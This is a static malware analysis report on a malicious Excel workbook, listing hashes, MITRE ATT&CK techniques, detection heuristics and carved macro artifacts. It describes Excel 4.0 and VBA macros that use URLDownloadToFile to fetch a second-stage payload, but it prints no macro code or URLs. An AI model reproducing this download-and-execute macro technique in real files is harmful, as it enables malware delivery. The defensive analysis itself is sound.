Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 a4b2c08ccb475bdd…

MALICIOUS

Office (OLE) / .XLS

57.5 KB Created: 2021-03-31 12:20:41
MD5: e259dfe9d4e77c25be763f9db1653e15 SHA-1: 61aa55f50938b2fe100ec9b65160c8a90f1789e2 SHA-256: a4b2c08ccb475bdd4767c584f58ca515b8991e7c9313fe2cc3c7329b47dc40c1
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1059.001 PowerShell

The file contains Excel 4.0 macros and VBA macros, with the VBA code specifically utilizing the URLDownloadToFileA API. This indicates the macro is designed to download and execute a second-stage payload from a remote location. The presence of both XLM and VBA macros suggests a multi-stage approach to achieve its malicious objective. The document body content is heavily obfuscated and does not provide clear user-facing lures.

Heuristics 4

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt
ae758ec551bf718a0c766cd5f899bcd2c35d4584ecca609454b4e93b017a6412		 xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 675 bytes
macros.bas
ab6e1002e0bf816ed39394e653bbdeaea610547c9ac92d50c859b9fde925072b		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 2869 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.